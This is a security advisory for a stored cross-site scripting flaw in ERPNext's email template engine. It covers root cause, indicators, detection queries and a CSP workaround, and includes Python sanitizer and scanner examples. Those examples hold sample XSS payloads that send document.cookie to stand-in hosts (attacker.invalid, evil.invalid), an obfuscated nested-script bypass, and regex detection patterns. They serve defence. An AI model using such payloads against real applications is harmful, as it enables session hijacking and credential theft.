CVE-2026-38432 Overview
CVE-2026-38432 is a stored Cross-Site Scripting (XSS) vulnerability affecting ERPNext v15.103.1 and earlier versions. The flaw resides in the Email Template engine, where input is not properly sanitized before rendering. An authenticated attacker with permission to create or edit email templates can inject malicious JavaScript. The injected payload executes in the victim's browser when the template is applied. The vulnerability is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation).
Critical Impact
Authenticated attackers can execute arbitrary JavaScript in the browser of any user who applies a poisoned email template, enabling session hijacking, credential theft, and unauthorized actions within ERPNext.
Affected Products
- ERPNext v15.103.1
- ERPNext versions prior to v15.103.1
- Frappe Email Template engine integrated with ERPNext
Discovery Timeline
- 2026-05-05 - CVE-2026-38432 published to NVD
- 2026-05-07 - Last updated in NVD database
Technical Details for CVE-2026-38432
Vulnerability Analysis
The vulnerability exists within the ERPNext Email Template engine, a feature that allows administrators and privileged users to define reusable HTML email bodies with dynamic placeholders. The template engine fails to neutralize JavaScript content embedded inside template fields before rendering them in the application's web interface.
When a user applies a malicious template, the rendering context evaluates the embedded <script> tags or HTML event handlers. The payload runs with the privileges of the victim's session within the ERPNext application. This stored XSS pattern persists across sessions because the malicious content is saved server-side as part of the template record.
The attack requires authenticated access with permission to create or edit email templates, and it requires user interaction: the payload fires only when a victim selects, previews, or sends with the poisoned template. In CVSS terms the scope is changed, because the script runs in the victim's browser, outside the security boundary of the server-side record in which it is stored.
Root Cause
The root cause is missing or insufficient sanitization of user-controlled email template fields before they are rendered as HTML. The application trusts template authors to supply safe markup: it neither applies an allowlist sanitizer when the template is saved nor encodes the body when it is rendered. Note that escaping the values substituted into placeholders would not help here, because the untrusted input is the template body itself, not the data merged into it. The absence of a Content Security Policy that blocks inline script is a missing defense-in-depth layer rather than the root cause, but it is why nothing downstream catches the injected payload.
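To make the root cause concrete, the following Python block contrasts a renderer that escapes only the substituted placeholder values (the pattern that leaves a stored-template XSS intact) with one that sanitizes the stored body on save. It is an added illustration written for this page; it is not Frappe or ERPNext code, not the proof of concept, and does not reproduce Frappe's own sanitizer. The placeholder syntax, the allowlist, and the sample template body are assumptions.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample of an attacker-authored template body (assumption, not
# taken from the public write-up). Placeholder syntax mirrors {{ name }}.
MALICIOUS_TEMPLATE = (
    "<p>Dear {{ customer_name }},</p>"
    "<img src=\"x\" onerror=\"fetch('https://attacker.invalid/?c=' + document.cookie)\">"
    "<script>alert(document.domain)</script>"
    "<a href=\"&#106;avascript:alert(1)\">View invoice</a>"
)

PLACEHOLDER = re.compile(r"{{\s*(\w+)\s*}}")


def render_naive(body: str, context: dict) -> str:
    """Vulnerable pattern: only substituted *values* are escaped. The body is
    author-controlled and emitted verbatim, so stored script survives."""
    return PLACEHOLDER.sub(
        lambda m: html.escape(str(context.get(m.group(1), ""))), body
    )


# Allowlist for the hardened template store (assumed; extend per business need).
ALLOWED_TAGS = {"p", "br", "b", "strong", "i", "em", "u", "a", "img", "ul",
                "ol", "li", "table", "tr", "td", "th", "h1", "h2", "h3"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt", "width", "height"}}
VOID_TAGS = {"br", "img"}
SAFE_SCHEME = re.compile(r"^(https?|mailto):", re.IGNORECASE)


def safe_url(value: str) -> bool:
    # HTMLParser already decoded entities, so "&#106;avascript:" arrives as
    # "javascript:". Also strip whitespace/control bytes browsers ignore.
    stripped = re.sub(r"[\s\x00-\x1f]", "", value)
    if ":" not in stripped:
        return True  # relative reference, no scheme at all
    return bool(SAFE_SCHEME.match(stripped))


class AllowlistSanitizer(HTMLParser):
    """Re-serialises only allowlisted tags/attributes; drops everything else,
    including the text inside <script> and <style>."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropping = 0  # > 0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.dropping += 1
            return
        if tag not in ALLOWED_TAGS or self.dropping:
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # drops every on* handler and style=
            if name in ("href", "src") and not safe_url(value or ""):
                continue
            esc = html.escape(value or "", quote=True)
            kept.append(f' {name}="{esc}"')
        self.out.append("<" + tag + "".join(kept) + ">")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.dropping = max(0, self.dropping - 1)
            return
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS and not self.dropping:
            self.out.append("</" + tag + ">")

    def handle_data(self, data):
        if not self.dropping:
            self.out.append(html.escape(data, quote=False))

    def result(self) -> str:
        return "".join(self.out)


def sanitize_template(body: str) -> str:
    """What the server should do on save: sanitize the author-supplied body."""
    parser = AllowlistSanitizer()
    parser.feed(body)
    parser.close()
    return parser.result()


def render_hardened(body: str, context: dict) -> str:
    return render_naive(sanitize_template(body), context)


if __name__ == "__main__":
    ctx = {"customer_name": "Ann <b>x</b>"}
    print("naive:   ", render_naive(MALICIOUS_TEMPLATE, ctx))
    print("hardened:", render_hardened(MALICIOUS_TEMPLATE, ctx))
```

The sanitizer is allowlist-based on purpose: a denylist of known-bad tags or a regex that strips `<script>` is easy to bypass (nested tags, entity-encoded `javascript:` URIs, uppercase handlers), whereas re-serialising only approved tags and attributes leaves no path for active content.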
Attack Vector
An attacker first obtains an account with email template management privileges. The attacker then creates or modifies a template containing JavaScript inside HTML attributes or script blocks. When another ERPNext user, including higher-privileged administrators, applies the template, the script executes in their browser context. Refer to the public technical write-up for proof-of-concept details.
Detection Methods for CVE-2026-38432
Indicators of Compromise
- Email Template records containing <script> tags, javascript: URIs, or HTML event handlers such as onerror, onload, or onclick, including HTML-entity-encoded variants (for example &#106;avascript:) that a naive string match misses.
- Audit log entries showing template creation or modification by accounts that do not normally manage communications.
- Browser console errors or unexpected outbound network requests originating from the ERPNext UI when previewing or sending templated emails.
Detection Strategies
- Query the tabEmail Template table (the subject and the body fields, typically response and response_html) for suspicious HTML patterns, decode HTML entities before matching, and review any matches against the expected template content.
- Inspect web server access logs for POST and PUT requests to /api/method/frappe.client.set_value, /api/method/frappe.desk.form.save.savedocs (the endpoint the desk form uses to save), and /api/resource/Email%20Template. The proxy log alone does not identify the account, so attribute requests through the Version records Frappe writes when tracked documents change, or through the session's other activity.
- Correlate template edits with subsequent authenticated session anomalies, such as new API key generation or user permission changes.
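As an added worked example of the first detection strategy (written for this page; not a Frappe or ERPNext tool), the following Python script applies the indicator patterns to rows that stand in for the result of a query against tabEmail Template. The rows are constructed, and the field names response and response_html are assumed from the Email Template doctype; check them against your instance's schema before running the real query.

```python
import html
import re

# Constructed rows standing in for:
#   SELECT name, subject, response, response_html FROM `tabEmail Template`
# Field names are assumed from the Email Template doctype; verify on your site.
SAMPLE_ROWS = [
    {"name": "Payment Reminder", "subject": "Invoice {{ doc.name }} due",
     "response": "<p>Dear {{ doc.customer_name }}, please pay.</p>",
     "response_html": ""},
    {"name": "Welcome", "subject": "Welcome",
     "response": "",
     "response_html": '<p>Hi</p><img src=x ONERROR="fetch(`//evil.invalid/`+document.cookie)">'},
    {"name": "Quote Follow-up", "subject": "Your quote",
     "response": '<a href="&#106;avascript:alert(1)">Open</a><p>Thanks</p>',
     "response_html": ""},
    {"name": "Ticket Closed", "subject": "Closed",
     "response": "<p>Your ticket is closed.</p><scr<script>ipt>alert(1)</script>",
     "response_html": ""},
]

FIELDS = ("subject", "response", "response_html")

# Each pattern is one indicator from the IoC list. Matching is case-insensitive
# because tag and attribute names are case-insensitive in HTML.
PATTERNS = {
    "script_tag": re.compile(r"<\s*script\b", re.IGNORECASE),
    # an on* handler in attribute position, not e.g. "?option=" in a URL
    "event_handler": re.compile(r"""[\s"'/]on[a-z]+\s*=""", re.IGNORECASE),
    "javascript_uri": re.compile(
        r"""(href|src|action|data)\s*=\s*['"]?\s*javascript:""", re.IGNORECASE),
    "data_uri_html": re.compile(r"data:text/html", re.IGNORECASE),
    "active_embed": re.compile(r"<\s*(iframe|object|embed|svg|math)\b", re.IGNORECASE),
}


def normalise(value: str) -> str:
    # Decode entity-encoded payloads (&#106;avascript:) before matching.
    # Whitespace inside a scheme (java\tscript:) is a known evasion; if you
    # see it, add a second pass that strips control characters.
    return html.unescape(value)


def scan_template(row: dict) -> list:
    """Return one finding per (field, indicator) that matches in this row."""
    findings = []
    for field in FIELDS:
        text = normalise(row.get(field) or "")
        for indicator, pattern in PATTERNS.items():
            match = pattern.search(text)
            if match:
                start = max(0, match.start() - 20)
                findings.append({
                    "name": row["name"],
                    "field": field,
                    "indicator": indicator,
                    "snippet": text[start:match.end() + 40],
                })
    return findings


def scan_all(rows: list) -> list:
    return [finding for row in rows for finding in scan_template(row)]


if __name__ == "__main__":
    for f in scan_all(SAMPLE_ROWS):
        print(f"{f['name']!r} [{f['field']}] {f['indicator']}: {f['snippet']}")
```

Treat every hit as a triage lead rather than an automatic removal: legitimate templates occasionally contain an `<svg>` logo or a `data:` image, so compare each match against the template's last known-good Version record before deciding it is malicious.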
Monitoring Recommendations
- Enable change tracking (Track Changes, which writes Version records) for the Email Template doctype and forward those events to a centralized log platform for retention and review.
- Alert on any modification to email templates outside scheduled change windows or by non-administrative roles.
- Monitor browser-side telemetry, such as CSP violation reports, to surface inline script execution attempts.
How to Mitigate CVE-2026-38432
Immediate Actions Required
- Upgrade ERPNext to a version newer than v15.103.1 once the vendor publishes a fixed release that addresses the Email Template sanitization issue.
- Restrict the Email Template Manager and equivalent roles to a small set of trusted administrators until patching is complete.
- Audit existing email templates and remove any entries containing inline scripts, event handlers, or javascript: URIs.
Patch Information
No specific patched version is listed in the NVD record at the time of publication. Administrators should track the ERPNext GitHub repository and the Frappe security advisories for fix announcements and apply updates promptly when released.
Workarounds
- Apply a strict Content Security Policy that disallows inline scripts (script-src 'self') at the reverse proxy or application layer to blunt injected payloads. This does not fix the bug, it only limits what an injected script can do, and the Frappe desk UI relies on inline scripts and evaluated client scripts, so a policy this strict is likely to break normal use: deploy it first as Content-Security-Policy-Report-Only, review the violation reports, and test on a staging instance before enforcing.
- Reduce the number of users assigned roles with email template create or edit permissions to limit the attack surface.
- Implement a manual review workflow that requires a second administrator to approve any new or modified email template before it can be applied.
# Example: enforce CSP via Nginx in front of ERPNext
# Test first by sending the same value in Content-Security-Policy-Report-Only;
# the desk UI is likely to need adjustments before this can be enforced.
add_header Content-Security-Policy "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'; frame-ancestors 'self'" always;
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.